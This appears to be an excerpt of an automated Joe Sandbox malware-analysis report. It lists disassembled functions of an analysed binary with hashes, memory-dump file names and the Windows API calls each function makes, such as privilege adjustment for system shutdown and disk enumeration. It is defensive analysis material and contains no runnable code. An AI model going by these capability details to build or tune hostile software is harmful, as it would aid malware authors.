                                                                                                                                                                                                                                                                                    • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                    • Opcode ID: 93efda853aae18ac3b24485165a57be69ad564f2791e1e021dd8550b08ca92a7
                                                                                                                                                                                                                                                                                    • Instruction ID: 566fded381b5c44124f86d85541a2f214abba5eb8d90c512736025a7e78c9a4c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93efda853aae18ac3b24485165a57be69ad564f2791e1e021dd8550b08ca92a7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD15BB2D082189AF7248A24DC94BFB7675EF94310F0881FAD44D97780D67E0FC58B66
                                                                                                                                                                                                                                                                                    Function 00436E36 Relevance: 15.3, Strings: 12, Instructions: 286COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                    • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                    • Opcode ID: d1022c59ea0b9a5d9822464d441f60f24f82c4066ffcf43c3b8c3142c8d63b51
                                                                                                                                                                                                                                                                                    • Instruction ID: 1b04957f8641a02fe2ad15b2e7decd8342e4988316b47231fcf7e75471d053ba
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1022c59ea0b9a5d9822464d441f60f24f82c4066ffcf43c3b8c3142c8d63b51
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05A199A2D182549AF7208A24DC50BFB6679EF94310F0881FED54D976C0E67F0FC58B6A
                                                                                                                                                                                                                                                                                    Function 00436E5E Relevance: 15.3, Strings: 12, Instructions: 271COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                    • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                    • Opcode ID: 67708232c783caed01210743f30500afd73b8ffc04a3e19dad3ec982a8eb5999
                                                                                                                                                                                                                                                                                    • Instruction ID: 188e51f99b3aa9ddec7d557129ce05f34de3fbb78c9ae6bc7f213ff74b940b60
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67708232c783caed01210743f30500afd73b8ffc04a3e19dad3ec982a8eb5999
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4A178A2D182549AF7208A24DC547FB6679EF94300F0881FED54D976C0E67F0FC58B2A
                                                                                                                                                                                                                                                                                    Function 00419D90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,00421955), ref: 00419D9A
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00421955), ref: 00419DA1
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00419DB7
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00421955), ref: 00419DC6
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00419E04
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00419E13
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00419E24
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 1280518032-3733053543
                                                                                                                                                                                                                                                                                    • Opcode ID: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                    • Instruction ID: d07024e087d9fbb4da489035f39631b0ffcbbc48e9dced30be6a628d6d85d024
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D91130B5208300ABD314DFA4DC89B5B77E4BB88B00F80882CF54DC6290E778D8C48B5A
                                                                                                                                                                                                                                                                                    Function 00461F10 Relevance: 12.8, APIs: 6, Strings: 1, Instructions: 598COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: $>
                                                                                                                                                                                                                                                                                    • API String ID: 0-4162622711
                                                                                                                                                                                                                                                                                    • Opcode ID: 92d9eede98623f53117d376c72bc09aac5265e67f7db331a73714669efe9eeb3
                                                                                                                                                                                                                                                                                    • Instruction ID: ab613082dd5abe8ce957bb114a2766d0e8ed38c9df93d9e2be8208bb24206897
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92d9eede98623f53117d376c72bc09aac5265e67f7db331a73714669efe9eeb3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5432C1705087419BC339DF24C950BEBB7E5FF99300F04492EE99A872A0E7789945CB5B
                                                                                                                                                                                                                                                                                    Function 0041E0F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49shutdownCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,00421972), ref: 0041E100
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00421972), ref: 0041E107
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041E124
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0041E148
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041E14E
                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000001,80020003), ref: 0041E16E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                    • Opcode ID: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                    • Instruction ID: ff8bdaaac48f1339d689247c0ac3bb4d0c15d19762690cb1fcb66aa4c131ddab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301FC35644310BFE3109BA8DC49B9B7698BB44B04F40482DFD4DE6191D77499408BDA
                                                                                                                                                                                                                                                                                    Function 0045A7D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 170fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?), ref: 0045A8C2
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A915
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0045A955
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?), ref: 0045A9AA
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A9CE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DiskFreeSpace$Find$CloseFileFirst
                                                                                                                                                                                                                                                                                    • String ID: %c:\
                                                                                                                                                                                                                                                                                    • API String ID: 281833627-3142399695
                                                                                                                                                                                                                                                                                    • Opcode ID: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                    • Instruction ID: 5c1349d2b4a299dbbed6192556f5b370b8187b703f81d55d5c722b9a40b8fb44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A071FBB55057019FD314DF64D988BABB7E4FF98711F008A2EE89A87390E734A848CF56
                                                                                                                                                                                                                                                                                    Function 0041F8D0 Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 0041F916
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000027,?,00000000), ref: 0041F937
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041F945
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041F94B
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041F958
                                                                                                                                                                                                                                                                                    • DrawIcon.USER32(?,?,?,?), ref: 0041F989
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2166663075-0
                                                                                                                                                                                                                                                                                    • Opcode ID: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                    • Instruction ID: c07e6ffc6c3a7e6482c06200d306031f545548e1037b46c62c472d77c4aae73d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE3158712086019FD324DF38C989BABB7E8FB88710F144A2EE19A93290DB74E845CB55
                                                                                                                                                                                                                                                                                    Function 00419CF0 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00020028,?), ref: 00419CFD
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00419D04
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00419D1E
                                                                                                                                                                                                                                                                                    Memory Dump Source
